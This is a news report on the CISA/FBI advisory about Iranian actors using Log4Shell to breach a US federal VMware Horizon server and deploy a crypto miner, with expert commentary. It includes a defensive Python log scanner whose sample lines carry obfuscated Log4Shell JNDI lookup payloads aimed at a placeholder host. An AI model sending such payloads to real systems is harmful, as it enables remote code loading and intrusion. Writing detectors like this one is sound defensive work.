CISA and FBI release joint advisory on Iranian threat activity.
N2K, Nov 17, 2022

CISA and the FBI released a joint advisory yesterday, warning of Iranian threat activity in a US federal network.

The US Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) released a joint cybersecurity advisory yesterday on Iranian government-sponsored APT actors compromising a federal network.

Exploitation of well-known vulnerability.

CyberScoop reports that threat actors with links to the Iranian government hacked into a US government agency’s network at the beginning of this year. The hackers used the well-known Log4Shell vulnerability to compromise a VMware Horizon server in February and then moved laterally across the network. Bleeping Computer reports that the hackers deployed a cryptocurrency miner and installed reverse proxies on compromised servers to maintain access to the network.

Hunting for compromise.

Security Week reports that CISA and the FBI published indicators of compromise (IOCs) to help potentially affected organizations hunt for infection on the assumption that a compromise has already occurred. The agencies said in the advisory, “All organizations with affected VMware systems that did not immediately apply available patches or workarounds [should] assume compromise and initiate threat hunting activities.” If signs of compromise are found, connected systems should be investigated and privileged accounts should be audited.
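The hunting guidance above, and the Log4Shell exploitation path described earlier, can be turned into a first triage pass over web access logs. The following Python detector is an added example, not code from the advisory or from the agencies: it runs over constructed sample log lines (not indicators from the advisory), URL-decodes each line, unwraps the `${lower:}`/`${upper:}` and `${:-}` lookups that are nested to hide the literal `jndi`, and reports the line, source address and lookup scheme. The sample IP addresses, paths and timestamps are assumptions.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not indicators from the advisory).
# Lines 2-4 carry a Log4j JNDI lookup string in the User-Agent or query,
# each written with a different obfuscation; line 1 is benign traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [14/Feb/2022:10:01:22 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [14/Feb/2022:10:02:03 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.10:1389/a}"
10.0.0.9 - - [14/Feb/2022:10:02:09 +0000] "GET /portal/?q=%24%7B%24%7Blower%3Aj%7Dndi%3Armi%3A%2F%2F203.0.113.10%2Fb%7D HTTP/1.1" 400 0 "-" "curl/7.68"
10.0.0.9 - - [14/Feb/2022:10:02:15 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:dns://203.0.113.10/c}"
"""

# Log4j lookups that get nested to hide the literal string "jndi":
# ${lower:X}/${upper:X} evaluate to X, and ${anything:-X} evaluates to the
# default value X.  Both are unwrapped here until the text stops changing.
_CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^{}]*)\}", re.IGNORECASE)
_DEFAULT_LOOKUP = re.compile(r"\$\{[^{}]*?:-([^{}]*)\}")
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)?", re.IGNORECASE)

def normalize(text: str, max_rounds: int = 10) -> str:
    """URL-decode and peel nested lookups so obfuscated variants collapse
    to the plain ${jndi:...} form the final check looks for."""
    text = unquote(text)
    for _ in range(max_rounds):
        new = _CASE_LOOKUP.sub(lambda m: m.group(1).lower(), text)
        new = _DEFAULT_LOOKUP.sub(lambda m: m.group(1), new)
        if new == text:
            break
        text = new
    return text

def find_jndi_lookups(log_text: str) -> list[tuple[int, str, str]]:
    """Return (line number, source IP, scheme) for each log line that carries
    a JNDI lookup after normalization.  A hit is a hunting lead to triage,
    not proof that the lookup resolved or that the host was compromised."""
    hits = []
    for n, line in enumerate(log_text.splitlines(), start=1):
        m = _JNDI.search(normalize(line))
        if m:
            src_ip = line.split(" ", 1)[0]
            hits.append((n, src_ip, (m.group(1) or "unknown").lower()))
    return hits

if __name__ == "__main__":
    for line_no, ip, scheme in find_jndi_lookups(SAMPLE_LOG):
        print(f"line {line_no}: JNDI lookup via {scheme} from {ip}")
```

A hit on a Horizon server's logs from the exploitation window is the cue to pivot to the host itself (new scheduled tasks, unexpected miner or proxy processes, outbound connections) and to the privileged-account audit the advisory calls for.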

Attribution to Nemesis Kitten.

While many news outlets have not attributed the attacks to a specific threat actor, the Washington Post published an independent account (based on anonymous sources) identifying the threat group as Nemesis Kitten and the victimized agency as the US Merit Systems Protection Board. The Post quotes Bryan Ware, CEO of LookingGlass Cyber and a former top CISA official, who speculates that the cryptojacking may have been misdirection: “It’s possible Iran used it to obfuscate other activities like espionage or mislead the incident response team — essentially spies disguising themselves as criminals.”

Added, 7:15 PM, November 17th, 2022.

Nic Finn, Threat Intelligence Consultant at GuidePoint Security, offered some context on Nemesis Kitten's track record:

"Microsoft recently released a threat profile on DEV-0270 (Nemesis Kitten) which described a potential for Nemesis Kitten actors to moonlight for personal profit. Nemesis Kitten has been observed conducting crypto-mining and ransomware attacks for quite some time in order to increase revenue for the Iranian regime. Additionally, these hackers have been observed attempting to impact the US Presidential election, with multiple indictments for attempting to influence the 2020 election by hacking into voter websites, disseminating fake videos alleging voter fraud, and threatening voters."

Update: Risks of laggard patching.

Added, 11:30 AM, November 17th, 2022.

Tim Mackey, Principal Security Strategist at Synopsys Cybersecurity Research Center, emphasizes that it's been almost a year since the Log4Shell vulnerability was identified, disclosed, and patched, and yet exploitation continues: “Addressing the log4shell vulnerability in production systems is not a new task. It has, after all, been almost a year since that vulnerability was disclosed and patches issued. If your organization can't attest to completing the task of patching for log4shell, then that implies a lack of awareness of the issue. Part of a comprehensive patch process includes an accurate accounting of the software powering the business, and any libraries it depends upon. Criminal groups know businesses are lax with their patch process, which means the software risk in unpatched software is real risk to businesses that haven't patched.”

Added, 7:15 PM, November 17th, 2022.

Nic Finn, of GuidePoint Security, observes that the incident shows a shortfall in vulnerability management practices:

"This clearly shows that organizations, even including federal agencies, are failing to maintain strong vulnerability management processes. There are over 13,000 US-based servers hosting VMWare Horizon, according to Shodan data. It is a trivial process for an actor with Nemesis Kitten's resources to attempt to exploit this vulnerability against those servers. Even a 1% vulnerability rate still indicates 130 vulnerable servers. Organizations need to establish thorough Attack Surface Monitoring processes and regularly check for vulnerable services across their servers."

Update: Why cryptojacking?

Added, 7:15 PM, November 17th, 2022.

GuidePoint Security's Nic Finn offered some observations about the cryptojacking component of Nemesis Kitten's operation:

"Nemesis Kitten has been using crypto-mining against victims for a long time. This is lucrative because they can expend manpower resources to gain access to victim networks, then collect crypto directly without the need to interact with victims for negotiations, as we see in ransomware engagements. Targeting of federal agencies isn't particularly surprising, considering the number of government agencies and the size of their networks. CISA has noted Iran-based cyber actors targeting federal agencies since at least September 2020. What's noteworthy about CISA's publication is that these targets are VMWare Horizon servers, meaning there is the potential for significantly more resources to be expended, resulting in higher profits for Nemesis Kitten while potentially being harder to observe and impacting fewer hosts across a victim network."

Chris Gray, AVP of Security Strategy at Deepwatch, sent in some reflections on the possibilities of misdirection in a cyberattack:

"It isn't uncommon for exploited systems to be used for remote storage/processing/access. We hear about breaches for the sake of stealing data or ransomware, but using them for purposes such as this, where money can be made iteratively via a remote web of systems (similar to the SETI initiative on a "nicer" model) with little to no real risk is also a viable money maker. Low-risk (i.e., not heavily monitored or secured) targets can be exploited and used for some time. The odds are that hackers will discover these systems, and they may only need to expend a minor effort to break in. It then becomes a monetized throwaway asset that might make you $5 in the interim between exploit and detection. Why not make some cash at someone else’s cost when it only costs a few moments of effort?

"Or…. It could be a smokescreen. Easily found and exploited systems can be used as rapid infiltration and jump off points. If I leave behind an obvious, minimally harmful presence, the defending teams may simply fix that problem and move on. There may be no real effort to dig deeper. I removed the “thing.” I can go to my next problem, right? The next problem, however, may be what wasn’t found. Easy battles can sometimes make us blind to the effort needed to win the war.

"DEV-0270 ("Nemesis Kitten") is a subgroup of an Iranian actor group called Phosphorus. They are somewhat (in)famous for using legacy vulnerabilities to exploit systems. This isn't special; this kind of exploit is a significant attack vector for everyone. This case highlights this history, though, given that Log4j was and is not new. It was a thing that could have been patched but wasn’t.

"As for what Log4j even means for the cyber community, it means the same thing it always has. Know and fix your environments. We tend to heavily pursue remediation for "new" vulnerabilities on critical systems and applications. Lower-risk targets are prioritized for later fixes to catch up to the situation over time. In many vulnerability management programs, we never get to the lower prioritized objectives in light of the "new hotness." Those risks remain, often fading from our awareness over time. The vulnerabilities remain, and the weaponized tools of exploitation are available. These systems were vulnerable months after this flaw became known and were compromised when the effort was made.

"However, we can't look at this like it was a year after Log4j came out...this hack is dated much closer to the December 2021 release. So, this successful exploit was only one of many in play. Numerous organizations were falling victim to the same flaws at the time."